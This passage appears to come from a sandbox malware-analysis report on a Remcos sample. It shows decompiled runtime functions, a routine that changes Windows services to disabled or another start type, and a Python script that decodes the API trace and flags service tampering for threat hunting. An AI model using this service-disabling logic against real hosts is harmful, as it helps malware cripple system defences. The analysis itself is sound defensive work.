                                                                      									if(_t71 != 0x22) {
                                                                      										goto L11;
                                                                      									} else {
                                                                      										goto L13;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						__eflags = _t67 - 0x16;
                                                                      						if(_t67 == 0x16) {
                                                                      							L13:
                                                                      							_push(_t123);
                                                                      							_push(_t123);
                                                                      							_push(_t123);
                                                                      							_push(_t123);
                                                                      							E00438659();
                                                                      							asm("int3");
                                                                      							E00431740(0x4692c0, 0x1c);
                                                                      							_t130 = _a4;
                                                                      							_t75 = E004419B9(_t97, _t120, _t123, _t130, _t130, _a8);
                                                                      							_t108 = _t123;
                                                                      							_t125 = _t75;
                                                                      							__eflags = _t125;
                                                                      							if(_t125 != 0) {
                                                                      								_t76 = E00444255(_t97, _t108, _t120);
                                                                      								_v40 = _t76;
                                                                      								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
                                                                      								_t110 =  *((intOrPtr*)(_t76 + 0x48));
                                                                      								_v44 =  *((intOrPtr*)(_t76 + 0x48));
                                                                      								_v32 = 0;
                                                                      								_t79 = E0043A97B( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
                                                                      								_t138 = _t136 + 0x18;
                                                                      								__eflags = _t79;
                                                                      								if(_t79 == 0) {
                                                                      									L22:
                                                                      									_t99 = E004421F7(_t110, _v32 + 4);
                                                                      									__eflags = _t99;
                                                                      									if(_t99 == 0) {
                                                                      										goto L15;
                                                                      									} else {
                                                                      										_t20 = _t99 + 4; // 0x4
                                                                      										_v36 = _t20;
                                                                      										_t110 =  &_v48;
                                                                      										_t125 = 0;
                                                                      										_t86 = E0043A97B( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
                                                                      										_t138 = _t138 + 0x18;
                                                                      										__eflags = _t86;
                                                                      										if(_t86 == 0) {
                                                                      											L29:
                                                                      											_t126 = _v48;
                                                                      											E00441948(4);
                                                                      											_pop(_t112);
                                                                      											_v8 = _v8 & 0x00000000;
                                                                      											_t131 = _t130 + _t130;
                                                                      											_t113 = _t112 | 0xffffffff;
                                                                      											__eflags =  *(_t126 + 0x24 + _t131 * 8);
                                                                      											if(__eflags != 0) {
                                                                      												asm("lock xadd [edx], eax");
                                                                      												if(__eflags == 0) {
                                                                      													E004427C2( *(_t126 + 0x24 + _t131 * 8));
                                                                      													_pop(_t116);
                                                                      													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                                                                      													_t113 = _t116 | 0xffffffff;
                                                                      													__eflags = _t113;
                                                                      												}
                                                                      											}
                                                                      											_t88 = _v40;
                                                                      											__eflags =  *(_t88 + 0x350) & 0x00000002;
                                                                      											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
                                                                      												__eflags =  *0x46c994 & 0x00000001;
                                                                      												if(( *0x46c994 & 0x00000001) == 0) {
                                                                      													__eflags =  *(_t126 + 0x24 + _t131 * 8);
                                                                      													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
                                                                      														asm("lock xadd [eax], ecx");
                                                                      														__eflags = _t113 == 1;
                                                                      														if(_t113 == 1) {
                                                                      															E004427C2( *(_t126 + 0x24 + _t131 * 8));
                                                                      															_t51 = _t126 + 0x24 + _t131 * 8;
                                                                      															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                                                                      															__eflags =  *_t51;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
                                                                      											 *(_t126 + 0x24 + _t131 * 8) = _t99;
                                                                      											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
                                                                      											_v8 = 0xfffffffe;
                                                                      											E00441BAA();
                                                                      										} else {
                                                                      											__eflags = _t86 - 0x16;
                                                                      											if(_t86 == 0x16) {
                                                                      												L26:
                                                                      												_push(_t125);
                                                                      												_push(_t125);
                                                                      												_push(_t125);
                                                                      												_push(_t125);
                                                                      												_push(_t125);
                                                                      												goto L20;
                                                                      											} else {
                                                                      												__eflags = _t86 - 0x22;
                                                                      												if(_t86 != 0x22) {
                                                                      													__eflags = _t86;
                                                                      													if(_t86 == 0) {
                                                                      														goto L29;
                                                                      													} else {
                                                                      														E004427C2(_t99);
                                                                      														goto L15;
                                                                      													}
                                                                      												} else {
                                                                      													goto L26;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									__eflags = _t79 - 0x16;
                                                                      									if(_t79 == 0x16) {
                                                                      										L19:
                                                                      										_push(0);
                                                                      										_push(0);
                                                                      										_push(0);
                                                                      										_push(0);
                                                                      										_push(0);
                                                                      										L20:
                                                                      										_t79 = E00438659();
                                                                      									} else {
                                                                      										__eflags = _t79 - 0x22;
                                                                      										if(_t79 == 0x22) {
                                                                      											goto L19;
                                                                      										}
                                                                      									}
                                                                      									__eflags = _t79;
                                                                      									if(_t79 != 0) {
                                                                      										goto L15;
                                                                      									} else {
                                                                      										goto L22;
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								L15:
                                                                      							}
                                                                      							return E00431786();
                                                                      						} else {
                                                                      							__eflags = _t67 - 0x22;
                                                                      							if(_t67 == 0x22) {
                                                                      								goto L13;
                                                                      							} else {
                                                                      								goto L5;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					_t70 = E00440D3B(__ebx, _t101, __edx, _a4, 0);
                                                                      					L12:
                                                                      					return _t70;
                                                                      				}
                                                                      			}

                                                                      0x004419b9
                                                                      0x004419b9
                                                                      0x004419be
                                                                      0x004419c3
                                                                      0x004419d3
                                                                      0x004419d4
                                                                      0x004419dd
                                                                      0x004419e5
                                                                      0x004419ea
                                                                      0x004419ed
                                                                      0x004419ef
                                                                      0x004419fb
                                                                      0x00441a05
                                                                      0x00441a08
                                                                      0x00441a09
                                                                      0x00441a0b
                                                                      0x00441a3c
                                                                      0x00441a3d
                                                                      0x00441a43
                                                                      0x00000000
                                                                      0x00441a0d
                                                                      0x00441a17
                                                                      0x00441a1c
                                                                      0x00441a1f
                                                                      0x00441a21
                                                                      0x00441a3a
                                                                      0x00000000
                                                                      0x00441a23
                                                                      0x00441a23
                                                                      0x00441a26
                                                                      0x00000000
                                                                      0x00441a28
                                                                      0x00441a28
                                                                      0x00441a2b
                                                                      0x00000000
                                                                      0x00441a2d
                                                                      0x00000000
                                                                      0x00441a2d
                                                                      0x00441a2b
                                                                      0x00441a26
                                                                      0x00441a21
                                                                      0x004419f1
                                                                      0x004419f1
                                                                      0x004419f4
                                                                      0x00441a4b
                                                                      0x00441a4b
                                                                      0x00441a4c
                                                                      0x00441a4d
                                                                      0x00441a4e
                                                                      0x00441a50
                                                                      0x00441a55
                                                                      0x00441a5d
                                                                      0x00441a65
                                                                      0x00441a69
                                                                      0x00441a6f
                                                                      0x00441a70
                                                                      0x00441a72
                                                                      0x00441a74
                                                                      0x00441a7d
                                                                      0x00441a82
                                                                      0x00441a88
                                                                      0x00441a8b
                                                                      0x00441a8e
                                                                      0x00441a93
                                                                      0x00441aa2
                                                                      0x00441aa7
                                                                      0x00441aaa
                                                                      0x00441aac
                                                                      0x00441ac6
                                                                      0x00441ad3
                                                                      0x00441ad5
                                                                      0x00441ad7
                                                                      0x00000000
                                                                      0x00441ad9
                                                                      0x00441ad9
                                                                      0x00441adc
                                                                      0x00441adf
                                                                      0x00441aea
                                                                      0x00441aed
                                                                      0x00441af2
                                                                      0x00441af5
                                                                      0x00441af7
                                                                      0x00441b1a
                                                                      0x00441b1a
                                                                      0x00441b1f
                                                                      0x00441b24
                                                                      0x00441b25
                                                                      0x00441b29
                                                                      0x00441b2f
                                                                      0x00441b32
                                                                      0x00441b34
                                                                      0x00441b38
                                                                      0x00441b3c
                                                                      0x00441b42
                                                                      0x00441b47
                                                                      0x00441b48
                                                                      0x00441b4d
                                                                      0x00441b4d
                                                                      0x00441b4d
                                                                      0x00441b3c
                                                                      0x00441b50
                                                                      0x00441b53
                                                                      0x00441b5a
                                                                      0x00441b5c
                                                                      0x00441b63
                                                                      0x00441b69
                                                                      0x00441b6b
                                                                      0x00441b6d
                                                                      0x00441b71
                                                                      0x00441b72
                                                                      0x00441b78
                                                                      0x00441b7e
                                                                      0x00441b7e
                                                                      0x00441b7e
                                                                      0x00441b7e
                                                                      0x00441b72
                                                                      0x00441b6b
                                                                      0x00441b63
                                                                      0x00441b86
                                                                      0x00441b88
                                                                      0x00441b8f
                                                                      0x00441b93
                                                                      0x00441b9a
                                                                      0x00441af9
                                                                      0x00441af9
                                                                      0x00441afc
                                                                      0x00441b03
                                                                      0x00441b03
                                                                      0x00441b04
                                                                      0x00441b05
                                                                      0x00441b06
                                                                      0x00441b07
                                                                      0x00000000
                                                                      0x00441afe
                                                                      0x00441afe
                                                                      0x00441b01
                                                                      0x00441b0a
                                                                      0x00441b0c
                                                                      0x00000000
                                                                      0x00441b0e
                                                                      0x00441b0f
                                                                      0x00000000
                                                                      0x00441b14
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441b01
                                                                      0x00441afc
                                                                      0x00441af7
                                                                      0x00441aae
                                                                      0x00441aae
                                                                      0x00441ab1
                                                                      0x00441ab8
                                                                      0x00441ab8
                                                                      0x00441ab9
                                                                      0x00441aba
                                                                      0x00441abb
                                                                      0x00441abc
                                                                      0x00441abd
                                                                      0x00441abd
                                                                      0x00441ab3
                                                                      0x00441ab3
                                                                      0x00441ab6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441ab6
                                                                      0x00441ac2
                                                                      0x00441ac4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441ac4
                                                                      0x00441a76
                                                                      0x00441a76
                                                                      0x00441a76
                                                                      0x00441ba6
                                                                      0x004419f6
                                                                      0x004419f6
                                                                      0x004419f9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004419f9
                                                                      0x004419f4
                                                                      0x004419c5
                                                                      0x004419ca
                                                                      0x00441a47
                                                                      0x00441a4a
                                                                      0x00441a4a

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __cftoe
                                                                      • String ID:
                                                                      • API String ID: 4189289331-0
                                                                      • Opcode ID: d3e72acf44e3f5a67bf9fe81771ed45315caf7be2404a951975ac2997baac35b
                                                                      • Instruction ID: 7ec08d6e7ec97ea350624d46708061eb4f517761ab4ebaddb3acba4deaa8f158
                                                                      • Opcode Fuzzy Hash: d3e72acf44e3f5a67bf9fe81771ed45315caf7be2404a951975ac2997baac35b
                                                                      • Instruction Fuzzy Hash: 41510E71900205ABFB109B698D41FAF77A9EF48374F14421FF415A22A2EF3DDD80866C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E0040E9DC(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                      				void* _v8;
                                                                      				char _v12;
                                                                      				char _v24;
                                                                      				void* __esi;
                                                                      				intOrPtr _t40;
                                                                      				void* _t48;
                                                                      				intOrPtr* _t51;
                                                                      
                                                                      				E00431C0B( &_v12, 0);
                                                                      				_t48 =  *0x46fda8;
                                                                      				_v8 = _t48;
                                                                      				_t51 = E0040BBB2(_a4, E0040BAE1(0x46d130));
                                                                      				if(_t51 != 0) {
                                                                      					L5:
                                                                      					E00431C63( &_v12);
                                                                      					return _t51;
                                                                      				} else {
                                                                      					if(_t48 == 0) {
                                                                      						__eflags = E0040BCCC(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                                                                      						if(__eflags == 0) {
                                                                      							E0040B9AD( &_v24);
                                                                      							E00435A36( &_v24, 0x46969c);
                                                                      							asm("int3");
                                                                      							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
                                                                      							__eflags =  *0x46fd9c -  *((intOrPtr*)(_t40 + 4));
                                                                      							if( *0x46fd9c >  *((intOrPtr*)(_t40 + 4))) {
                                                                      								_push(_t51);
                                                                      								E00430D17(0x46fd9c);
                                                                      								__eflags =  *0x46fd9c - 0xffffffff;
                                                                      								if( *0x46fd9c == 0xffffffff) {
                                                                      									E0040ED92();
                                                                      									E004310BE(__eflags, 0x453dc8);
                                                                      									E00430CD8(0x46fd9c, 0x46fd9c);
                                                                      								}
                                                                      							}
                                                                      							return 0x46fda0;
                                                                      						} else {
                                                                      							_t51 = _v8;
                                                                      							 *0x46fda8 = _t51;
                                                                      							 *((intOrPtr*)( *_t51 + 4))();
                                                                      							E00431E1C(__eflags, _t51);
                                                                      							goto L5;
                                                                      						}
                                                                      					} else {
                                                                      						_t51 = _t48;
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      0x0040e9e9
                                                                      0x0040e9ee
                                                                      0x0040e9f9
                                                                      0x0040ea0a
                                                                      0x0040ea0e
                                                                      0x0040ea42
                                                                      0x0040ea45
                                                                      0x0040ea51
                                                                      0x0040ea10
                                                                      0x0040ea12
                                                                      0x0040ea26
                                                                      0x0040ea29
                                                                      0x0040ea55
                                                                      0x0040ea63
                                                                      0x0040ea68
                                                                      0x0040ea6f
                                                                      0x0040ea76
                                                                      0x0040ea7c
                                                                      0x0040ea7e
                                                                      0x0040ea85
                                                                      0x0040ea8a
                                                                      0x0040ea92
                                                                      0x0040ea94
                                                                      0x0040ea9e
                                                                      0x0040eaa4
                                                                      0x0040eaaa
                                                                      0x0040eaab
                                                                      0x0040eab1
                                                                      0x0040ea2b
                                                                      0x0040ea2b
                                                                      0x0040ea30
                                                                      0x0040ea38
                                                                      0x0040ea3c
                                                                      0x00000000
                                                                      0x0040ea41
                                                                      0x0040ea14
                                                                      0x0040ea14
                                                                      0x00000000
                                                                      0x0040ea14
                                                                      0x0040ea12

                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040E9E9
                                                                      • int.LIBCPMT ref: 0040E9FC
                                                                        • Part of subcall function 0040BAE1: std::_Lockit::_Lockit.LIBCPMT ref: 0040BAF2
                                                                        • Part of subcall function 0040BAE1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BB0C
                                                                      • std::_Facet_Register.LIBCPMT ref: 0040EA3C
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040EA45
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040EA63
                                                                      • __Init_thread_footer.LIBCMT ref: 0040EAA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                      • String ID:
                                                                      • API String ID: 3815856325-0
                                                                      • Opcode ID: 3748b76a2d14618ace7edfe6846318b36ac90a81fb565085e0f63014e37dfb8f
                                                                      • Instruction ID: 9c8ff9a50571c923da8d428752ab15b2b4e98a5757246ed7726996d64f402873
                                                                      • Opcode Fuzzy Hash: 3748b76a2d14618ace7edfe6846318b36ac90a81fb565085e0f63014e37dfb8f
                                                                      • Instruction Fuzzy Hash: 6421D3316001149BC714EB59D84299E7778AF48324F20017FF815B72E1EB7CAD058BDD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			// Sets a service's start type. __ecx is a mode byte (0 = disable, 1 = auto start,
                                                                      			// 2 = demand start); _a4 is the service name (E00401EC4 presumably yields it as an
                                                                      			// LPCWSTR, E00401EC9 is the matching cleanup). Returns nonzero on success. The SCM
                                                                      			// handle is never checked: if OpenSCManagerW fails, OpenServiceW simply fails too.
                                                                      			E004174F6(signed char __ecx, char _a4) {
                                                                      				signed char _v5;
                                                                      				void* _t7;
                                                                      				signed int _t11;
                                                                      				void* _t17;
                                                                      				short* _t21;
                                                                      				signed int _t24;
                                                                      				int _t25;
                                                                      				void* _t28;
                                                                      				void* _t31;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t21 = 0;
                                                                      				_v5 = __ecx;
                                                                      				_t7 = OpenSCManagerW(0, 0, 2); // 2 = SC_MANAGER_CREATE_SERVICE (administrators only by default)
                                                                      				_t24 =  &_a4;
                                                                      				_t31 = _t7;
                                                                      				_t28 = OpenServiceW(_t31, E00401EC4(_t24), 2); // 2 = SERVICE_CHANGE_CONFIG
                                                                      				if(_t28 != 0) {
                                                                      					_t25 = _t24 | 0xffffffff; // default dwStartType = SERVICE_NO_CHANGE if the mode byte is not 0, 1 or 2
                                                                      					_t11 = _v5 & 0x000000ff;
                                                                      					if(_t11 == 0) {
                                                                      						_push(4); // SERVICE_DISABLED
                                                                      						goto L8;
                                                                      					} else {
                                                                      						_t17 = _t11 - 1;
                                                                      						if(_t17 == 0) {
                                                                      							_push(2); // SERVICE_AUTO_START
                                                                      							goto L8;
                                                                      						} else {
                                                                      							if(_t17 == 1) {
                                                                      								_push(3); // SERVICE_DEMAND_START
                                                                      								L8:
                                                                      								_pop(_t25);
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					// ChangeServiceConfigW(hService, SERVICE_NO_CHANGE, dwStartType, SERVICE_NO_CHANGE, NULL x 7):
                                                                      					// only the start type is touched; binary path, account, dependencies and display name stay as they are.
                                                                      					// A start-type change is recorded by the Service Control Manager as System event 7040.
                                                                      					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
                                                                      					CloseServiceHandle(_t31);
                                                                      					CloseServiceHandle(_t28);
                                                                      				} else {
                                                                      					CloseServiceHandle(_t31);
                                                                      				}
                                                                      				E00401EC9();
                                                                      				return _t21;
                                                                      			}
                                                                      Statement addresses (IDA plugin column, one entry per statement of the listing above in listing order; 0x00000000 where the plugin assigns no address):
                                                                      0x004174f9 0x004174ff 0x00417501 0x00417506 0x0041750e 0x00417511 0x00417520 0x00417524 0x00417533 0x00417536 0x00417538 0x0041754c 0x00000000 0x0041753a 0x0041753a 0x0041753d 0x00417548 0x00000000 0x0041753f 0x00417542 0x00417544 0x0041754e 0x0041754e 0x0041754e 0x00417542 0x0041753d 0x0041756b 0x0041756e 0x00417571 0x00417526 0x00417527 0x00417527 0x00417576 0x00417583

                                                                      APIs
                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00416C0C,00000000), ref: 00417506
                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00416C0C,00000000), ref: 0041751A
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00416C0C,00000000), ref: 00417527
                                                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00416C0C,00000000), ref: 0041755C
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00416C0C,00000000), ref: 0041756E
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00416C0C,00000000), ref: 00417571
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                      • String ID:
                                                                      • API String ID: 493672254-0
                                                                      • Opcode ID: 3972264b078da9f6f9256ab5ce7a0d6e2e03e53fd051797eab198ccce29f9cd6
                                                                      • Instruction ID: 21c1e16b7769188433a76f907045e3d1a45979cf2c58f7482296d030932d7e0f
                                                                      • Opcode Fuzzy Hash: 3972264b078da9f6f9256ab5ce7a0d6e2e03e53fd051797eab198ccce29f9cd6
                                                                      • Instruction Fuzzy Hash: 04014E3118C2247AD6105B34DC0EEBF3A7DDB41775F200317F616961D1D974CE8191A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
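The two service routines on this page, E004174F6 above (ChangeServiceConfigW, with a mode byte of 0, 1 or 2 selecting disabled, auto start or demand start) and E00417324 further down (ControlService with SERVICE_CONTROL_STOP), appear in the "APIs" trace only as raw hex arguments. The script below is an added example, not code from Joe Sandbox or from the sample: it parses trace lines in the format used on this page, keeps only the documented parameters (the sandbox prints further stack slots after them, with "?" for unresolved ones), renders the access masks, start type and control code symbolically, and flags the two tampering actions. Assumptions: the embedded sample trace is copied verbatim from the two listings; treating 000000FF as SERVICE_NO_CHANGE is inferred from the listing pushing 0xffffffff at the same call.

```python
"""Decode the ADVAPI32 service-control calls in a Joe Sandbox 'APIs' trace.

Added example for this report, not code from Joe Sandbox or from the sample.
SAMPLE_TRACE is copied from the listings of E004174F6 and E00417324 on this page.
Assumption: the sandbox prints raw stack slots after the real parameters ('?' = unresolved).
"""
import re

# Documented parameter counts; anything after them on a trace line is stack noise.
PARAM_COUNT = {"OpenSCManagerW": 3, "OpenServiceW": 3, "ChangeServiceConfigW": 11,
               "ControlService": 3, "CloseServiceHandle": 1}
SCM_ACCESS = {0x1: "SC_MANAGER_CONNECT", 0x2: "SC_MANAGER_CREATE_SERVICE",
              0x4: "SC_MANAGER_ENUMERATE_SERVICE", 0x8: "SC_MANAGER_LOCK",
              0x10: "SC_MANAGER_QUERY_LOCK_STATUS", 0x20: "SC_MANAGER_MODIFY_BOOT_CONFIG"}
SERVICE_ACCESS = {0x1: "SERVICE_QUERY_CONFIG", 0x2: "SERVICE_CHANGE_CONFIG",
                  0x4: "SERVICE_QUERY_STATUS", 0x8: "SERVICE_ENUMERATE_DEPENDENTS",
                  0x10: "SERVICE_START", 0x20: "SERVICE_STOP", 0x40: "SERVICE_PAUSE_CONTINUE",
                  0x80: "SERVICE_INTERROGATE", 0x100: "SERVICE_USER_DEFINED_CONTROL"}
START_TYPE = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
              3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
CONTROL_CODE = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
# SERVICE_NO_CHANGE is 0xFFFFFFFF; the 0xffffffff the listing pushes before
# ref 0041755C is printed as 000000FF in this report's trace, so accept both.
NO_CHANGE = {0xFF, 0xFFFFFFFF}

LINE_RE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

def parse_line(line):
    """One trace line -> dict(api, module, ref, args); args are ints, None for '?'."""
    m = LINE_RE.match(line)
    if not m:
        return None
    api, module, raw_args, ref = m.groups()
    args = [a.strip() for a in raw_args.split(",")]
    args = args[:PARAM_COUNT.get(api, len(args))]      # drop the trailing stack slots
    values = [None if a == "?" else int(a, 16) for a in args]
    return {"api": api, "module": module, "ref": int(ref, 16), "args": values}

def _flags(value, table):
    """Access mask -> OR-ed symbolic names; undocumented bits are left in hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"

def _enum(value, table):
    """Scalar parameter -> symbolic name, honouring the SERVICE_NO_CHANGE sentinel."""
    if value is None:
        return "?"
    if value in NO_CHANGE:
        return "SERVICE_NO_CHANGE"
    return table.get(value, hex(value))

def describe(call):
    """Symbolic one-line rendering of a parsed service API call."""
    api, a = call["api"], call["args"]
    if api == "OpenSCManagerW":
        return "OpenSCManagerW(access=%s)" % _flags(a[2], SCM_ACCESS)
    if api == "OpenServiceW":
        return "OpenServiceW(access=%s)" % _flags(a[2], SERVICE_ACCESS)
    if api == "ChangeServiceConfigW":
        return "ChangeServiceConfigW(type=%s, start=%s, error_control=%s)" % (
            _enum(a[1], {}), _enum(a[2], START_TYPE), _enum(a[3], {}))
    if api == "ControlService":
        return "ControlService(control=%s)" % _enum(a[1], CONTROL_CODE)
    return api + "()"

def indicators(calls):
    """The two service-tampering actions a hunter would pivot on."""
    found = []
    for c in calls:
        if c["api"] == "ChangeServiceConfigW" and c["args"][2] == 4:
            found.append("start type set to SERVICE_DISABLED at 0x%08x" % c["ref"])
        if c["api"] == "ControlService" and c["args"][1] == 1:
            found.append("SERVICE_CONTROL_STOP sent at 0x%08x" % c["ref"])
    return found

def analyze(trace_text):
    """Return (symbolic descriptions, indicators) for every recognised line."""
    calls = [c for c in map(parse_line, trace_text.splitlines()) if c]
    return [describe(c) for c in calls], indicators(calls)

# Copied from the 'APIs' sections of E004174F6 and E00417324 on this page.
SAMPLE_TRACE = """\
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00416C0C,00000000), ref: 00417506
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00416C0C,00000000), ref: 0041751A
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,00416C0C,00000000), ref: 00417527
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00416C0C,00000000), ref: 0041755C
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,00416C0C,00000000), ref: 0041756E
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,00416C0C,00000000), ref: 00417571
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00416EA1,00000000), ref: 00417333
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00416EA1,00000000), ref: 00417347
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416EA1,00000000), ref: 00417354
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00416EA1,00000000), ref: 00417363
"""
```

Run `analyze(SAMPLE_TRACE)` and the first listing decodes to an SCM handle opened with SC_MANAGER_CREATE_SERVICE, a service handle opened with SERVICE_CHANGE_CONFIG and a ChangeServiceConfigW that sets only the start type, to SERVICE_DISABLED; the second to SC_MANAGER_MODIFY_BOOT_CONFIG (0x20, the same numeric value as the SERVICE_STOP right requested on the service handle) followed by SERVICE_CONTROL_STOP. Every one of those rights is granted by the default SCM and service DACLs to administrators only, so this code only does anything once Remcos runs elevated. On the host the same actions are recorded by the Service Control Manager in the System log as event 7040 (start type changed) and 7036 (service entered the stopped state), which is where to hunt for them; note that a successful ControlService only means the stop request was accepted, since E00417324 never polls the returned SERVICE_STATUS.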

                                                                      C-Code - Quality: 75%
                                                                      			// Runtime code, not sample logic: this matches the MSVC CRT per-thread data lookup
                                                                      			// (_getptd_noexit / _getptd pattern): read the FLS slot at *0x46c1cc, allocate and
                                                                      			// register the per-thread block (0x364 bytes) on first use, preserve GetLastError
                                                                      			// across the allocation, and abort the process if the block cannot be created.
                                                                      			E00444255(void* __ebx, void* __ecx, void* __edx) {
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr _t2;
                                                                      				void* _t3;
                                                                      				void* _t4;
                                                                      				intOrPtr _t9;
                                                                      				void* _t11;
                                                                      				void* _t20;
                                                                      				void* _t21;
                                                                      				void* _t23;
                                                                      				void* _t25;
                                                                      				void* _t27;
                                                                      				void* _t29;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      				long _t36;
                                                                      				long _t37;
                                                                      				void* _t40;
                                                                      
                                                                      				_t29 = __edx;
                                                                      				_t23 = __ecx;
                                                                      				_t20 = __ebx;
                                                                      				_t36 = GetLastError();
                                                                      				_t2 =  *0x46c1cc; // 0x6
                                                                      				_t42 = _t2 - 0xffffffff;
                                                                      				if(_t2 == 0xffffffff) {
                                                                      					L2:
                                                                      					_t3 = E00441BB3(_t23, 1, 0x364);
                                                                      					_t31 = _t3;
                                                                      					_pop(_t25);
                                                                      					if(_t31 != 0) {
                                                                      						_t4 = E00444852(_t25, _t36, __eflags,  *0x46c1cc, _t31);
                                                                      						__eflags = _t4;
                                                                      						if(_t4 != 0) {
                                                                      							E004440C7(_t25, _t31, 0x46d654);
                                                                      							E004427C2(0);
                                                                      							_t40 = _t40 + 0xc;
                                                                      							__eflags = _t31;
                                                                      							if(_t31 == 0) {
                                                                      								goto L9;
                                                                      							} else {
                                                                      								goto L8;
                                                                      							}
                                                                      						} else {
                                                                      							_push(_t31);
                                                                      							goto L4;
                                                                      						}
                                                                      					} else {
                                                                      						_push(_t3);
                                                                      						L4:
                                                                      						E004427C2();
                                                                      						_pop(_t25);
                                                                      						L9:
                                                                      						SetLastError(_t36);
                                                                      						E004421B4(_t20, _t29, _t31, _t36);
                                                                      						asm("int3");
                                                                      						_push(_t20);
                                                                      						_push(_t36);
                                                                      						_push(_t31);
                                                                      						_t37 = GetLastError();
                                                                      						_t21 = 0;
                                                                      						_t9 =  *0x46c1cc; // 0x6
                                                                      						_t45 = _t9 - 0xffffffff;
                                                                      						if(_t9 == 0xffffffff) {
                                                                      							L12:
                                                                      							_t32 = E00441BB3(_t25, 1, 0x364);
                                                                      							_pop(_t27);
                                                                      							if(_t32 != 0) {
